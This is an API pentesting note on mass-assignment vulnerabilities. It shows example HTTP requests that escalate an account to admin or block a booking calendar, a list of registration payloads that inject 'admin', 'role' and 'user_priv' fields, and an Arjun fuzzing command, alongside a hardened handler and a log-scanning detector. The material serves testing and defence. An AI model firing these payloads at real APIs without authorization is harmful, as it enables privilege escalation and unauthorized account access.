# mass assignment

Mass Assignment is a security vulnerability that arises when an application automatically assigns user input values to an object's properties without properly controlling which attributes are accessible for modification. This can result in unauthorized or unintended changes to sensitive data, such as modifying attributes that should only be editable by an administrator or specific users.

**How it works:**

* An application typically uses an object to represent entities (e.g., a user, product, or account) with various attributes (e.g., `user.email`, `product.stock`, `account.wallet`).
* When a user submits a request (usually a PUT or PATCH request), the application might directly map the user-supplied data to the object's properties.
* If the application does not validate or restrict which attributes can be modified, the user could potentially modify properties they shouldn't have access to (e.g., `product.title`, `account.wallet`, `account.type`).

#### **Scenario 1: Booking an Appointment for a Consultant**

An application allows users to book appointments for a consultant by selecting available time slots.

**Request Example (Normal Booking):**

```json
POST /book HTTP/1.1
Host: domain.com
Content-Type: application/json

{
    "startDate": "29/04/2022 11:00",
    "endDate": "29/04/2022 12:00",
    "userID": "123",
    "consultantID": "123"
}
```

An attacker realizes they can modify the `endDate` to extend the appointment for years, thereby blocking future slots.

**Request Example (Malicious Modification):**

```json
POST /book HTTP/1.1
Host: domain.com
Content-Type: application/json

{
    "startDate": "29/04/2022 11:00",
    "endDate": "29/04/2099 12:00",  // Extended to an unreasonable future date
    "userID": "123",
    "consultantID": "123"
}
```

By exploiting this, the attacker could fully block the consultant’s calendar for years. This is a subtle vulnerability, often overlooked because the system doesn’t properly validate the date range or check for unrealistic future times.

***

#### **Scenario 2: Changing User Account Type**

An attacker may gain unauthorized access to higher privileges by manipulating account-related parameters. In this case, the attacker finds that the `AccountType` property is reflected in the response but is not protected in the API.

**Request Example (Normal Profile Update):**

```json
POST /profile/update HTTP/1.1
Host: domain.com
Content-Type: application/json

{
    "endDate": "29/04/2099 12:00",
    "userID": "123",
    "consultantID": "123"
}
```

**Response**:

```json
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: <content-length>

{
    "AccountType": "user",   // Account type is returned in the response
    "endDate": "29/04/2099 12:00",
    "userID": "123",
    "consultantID": "123"
}
```

**Exploit: Modifying Account Type**

The attacker sends the same update request with the `AccountType` field added.

**Request Example (Malicious Modification):**

```json
POST /profile/update HTTP/1.1
Host: domain.com
Content-Type: application/json

{
    "endDate": "29/04/2099 12:00",
    "userID": "123",
    "consultantID": "123",
    "AccountType": "admin"   // Attacker adds this field
}
```

**Response**:

```json
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: <content-length>

{
    "AccountType": "admin",  // Account type has been changed to admin
    "endDate": "29/04/2099 12:00",
    "userID": "123",
    "consultantID": "123"
}
```

As a result, the attacker successfully changes their account type to `admin` without any validation, potentially gaining higher privileges such as administrative access.
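A minimal Python handler, added here as an illustration and not code from the original notes, shows the pattern behind both scenarios next to its hardened form: the vulnerable version writes every JSON key onto the object, while the fixed version allow-lists the writable fields, rejects anything else, and bounds the appointment duration. The `Account` class, the 4-hour limit and the sample bodies are constructed assumptions.

```python
import json
from datetime import datetime, timedelta

DATE_FMT = "%d/%m/%Y %H:%M"        # matches "29/04/2022 11:00" as used on this page
MAX_DURATION = timedelta(hours=4)  # assumed business limit for a single appointment

class Account:
    """Constructed model; AccountType is meant to be changed only by administrators."""
    def __init__(self):
        self.userID = "123"
        self.consultantID = "123"
        self.startDate = None
        self.endDate = None
        self.AccountType = "user"

# Constructed request bodies mirroring the page's examples
NORMAL_BODY = '{"startDate": "29/04/2022 11:00", "endDate": "29/04/2022 12:00", "userID": "123", "consultantID": "123"}'
MALICIOUS_BODY = '{"startDate": "29/04/2022 11:00", "endDate": "29/04/2099 12:00", "userID": "123", "consultantID": "123", "AccountType": "admin"}'

def update_vulnerable(account, body):
    """Mass assignment: every key the client sends is written onto the object."""
    for key, value in json.loads(body).items():
        setattr(account, key, value)
    return account

EDITABLE = {"startDate", "endDate", "consultantID"}  # the only client-writable fields

def update_hardened(account, body):
    """Allow-list writable fields, reject anything else, and bound the date range."""
    data = json.loads(body)
    # userID comes from the authenticated session; a copy in the body is ignored, never trusted
    unknown = set(data) - EDITABLE - {"userID"}
    if unknown:
        raise ValueError(f"unexpected field(s): {sorted(unknown)}")
    if not {"startDate", "endDate"} <= set(data):
        raise ValueError("startDate and endDate are required")
    start = datetime.strptime(data["startDate"], DATE_FMT)
    end = datetime.strptime(data["endDate"], DATE_FMT)
    if not timedelta(0) < end - start <= MAX_DURATION:
        raise ValueError("endDate must follow startDate by at most the allowed duration")
    for key in EDITABLE & set(data):
        setattr(account, key, data[key])
    return account
```

Rejecting unknown keys outright (rather than silently dropping them) also makes the probing requests from the testing section below visible in error logs.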

***

### Mass Assignment Testing Steps

#### Target Vulnerabilities:

* **Account Registration**
* **Unauthorized Access to Organizations**
* **Reset Password**
* **Login**
* **Change Email**
* **Change Username**

#### Account Registration Request:

* **Basic Request**:

  ```json
  POST /api/v1/register
  --snip--
  {
    "username": "hAPI_hacker",
    "email": "hapi@hacker.com",
    "password": "Password1!"
  }
  ```

#### Mass Assignment Variations:

1. **Try with `admin` key**:

   ```json
   POST /api/v1/register
   --snip--
   {
     "username": "hAPI_hacker",
     "email": "hapi@hacker.com",
     "admin": true,
     "password": "Password1!"
   }
   ```
2. **Try with `ADMIN` key**:

   ```json
   POST /api/v1/register
   --snip--
   {
     "username": "hAPI_hacker",
     "email": "hapi@hacker.com",
     "ADMIN": true,
     "password": "Password1!"
   }
   ```
3. **Try with `isadmin` key**:

   ```json
   POST /api/v1/register
   --snip--
   {
     "username": "hAPI_hacker",
     "email": "hapi@hacker.com",
     "isadmin": true,
     "password": "Password1!"
   }
   ```
4. **Try with `ISADMIN` key**:

   ```json
   POST /api/v1/register
   --snip--
   {
     "username": "hAPI_hacker",
     "email": "hapi@hacker.com",
     "ISADMIN": true,
     "password": "Password1!"
   }
   ```
5. **Try with `Admin` key**:

   ```json
   POST /api/v1/register
   --snip--
   {
     "username": "hAPI_hacker",
     "email": "hapi@hacker.com",
     "Admin": true,
     "password": "Password1!"
   }
   ```
6. **Try with `role` set to `admin`**:

   ```json
   POST /api/v1/register
   --snip--
   {
     "username": "hAPI_hacker",
     "email": "hapi@hacker.com",
     "role": "admin",
     "password": "Password1!"
   }
   ```
7. **Try with `role` set to `ADMIN`**:

   ```json
   POST /api/v1/register
   --snip--
   {
     "username": "hAPI_hacker",
     "email": "hapi@hacker.com",
     "role": "ADMIN",
     "password": "Password1!"
   }
   ```
8. **Try with `role` set to `administrator`**:

   ```json
   POST /api/v1/register
   --snip--
   {
     "username": "hAPI_hacker",
     "email": "hapi@hacker.com",
     "role": "administrator",
     "password": "Password1!"
   }
   ```
9. **Try with `user_priv` set to `administrator`**:

   ```json
   POST /api/v1/register
   --snip--
   {
     "username": "hAPI_hacker",
     "email": "hapi@hacker.com",
     "user_priv": "administrator",
     "password": "Password1!"
   }
   ```
10. **Try with `user_priv` set to `admin`**:

    ```json
    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "user_priv": "admin",
      "password": "Password1!"
    }
    ```
11. **Try with `admin` as integer**:

    ```json
    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "admin": 1,
      "password": "Password1!"
    }
    ```

#### Unauthorized Access to Organizations:

* **Register with Organization**:

  ```json
  POST /api/v1/register
  --snip--
  {
    "username": "hAPI_hacker",
    "email": "hapi@hacker.com",
    "org": "§CompanyA§",
    "password": "Password1!"
  }
  ```

#### Finding Variables in Documentation:

* Read the API documentation to find parameter names; some tips are [here](/security-notes/notes/api-pen/excessive-data-exposure.md).

#### Fuzzing Unknown Variables:

* Perform actions in the web application, intercept requests, and locate additional headers or parameters.

  ```json
  POST /create/user
  --snip--
  {
    "username": "hapi_hacker",
    "pass": "ff7ftw",
    "uam": 1,
    "mfa": true,
    "account": 101
  }
  ```

#### Automating Mass Assignment Attacks:

* **Use Arjun and Burp Suite Intruder**:

  ```bash
  arjun --headers "Content-Type: application/json" -u http://vulnhost.com/api/register -m JSON --include='{$arjun$}'
  ```
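As an added defender-side example (not part of the original notes), the scan below runs over constructed JSON-lines request logs, flags bodies carrying keys outside each endpoint's declared schema, and rates as high any extra key matching the privilege-style names tried above (`admin`, `ADMIN`, `isadmin`, `role`, `user_priv`, `org`, `AccountType`), case-insensitively. The endpoint schemas, source addresses and log lines are assumptions.

```python
import json
import re

# Declared request schema per endpoint (constructed for this example)
SCHEMA = {
    "/api/v1/register": {"username", "email", "password"},
    "/profile/update": {"startDate", "endDate", "userID", "consultantID"},
}

# Keys that would confer privilege if mass-assigned; case-insensitive so that
# admin / ADMIN / Admin / isadmin / ISADMIN all hit the same rule.
PRIVILEGE_KEY = re.compile(r"^(is_?admin|admin|role|user_priv|org|account_?type)$", re.I)

# Constructed JSON-lines access log: one request body per line
SAMPLE_LOG = """\
{"src": "203.0.113.5", "path": "/api/v1/register", "body": {"username": "alice", "email": "a@example.com", "password": "x"}}
{"src": "203.0.113.9", "path": "/api/v1/register", "body": {"username": "hAPI_hacker", "email": "hapi@hacker.com", "ADMIN": true, "password": "x"}}
{"src": "203.0.113.9", "path": "/api/v1/register", "body": {"username": "hAPI_hacker", "email": "hapi@hacker.com", "user_priv": "administrator", "password": "x"}}
{"src": "203.0.113.7", "path": "/profile/update", "body": {"endDate": "29/04/2099 12:00", "userID": "123", "consultantID": "123", "AccountType": "admin"}}
{"src": "203.0.113.2", "path": "/profile/update", "body": {"endDate": "29/04/2022 12:00", "userID": "123", "consultantID": "123", "nickname": "bob"}}
"""

def scan_log(text):
    """Return one finding per request whose body carries keys outside the endpoint schema."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        allowed = SCHEMA.get(rec["path"])
        if allowed is None:
            continue  # no schema for this endpoint, nothing to compare against
        extra = sorted(set(rec["body"]) - allowed)
        if not extra:
            continue
        privileged = [k for k in extra if PRIVILEGE_KEY.match(k)]
        findings.append({
            "src": rec["src"],
            "path": rec["path"],
            "extra_keys": extra,
            "severity": "high" if privileged else "low",
        })
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["src"], f["path"], f["extra_keys"])
```

The low-severity hits (unknown but harmless keys such as `nickname`) are worth keeping: a burst of them from one source is the fuzzing step described above.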
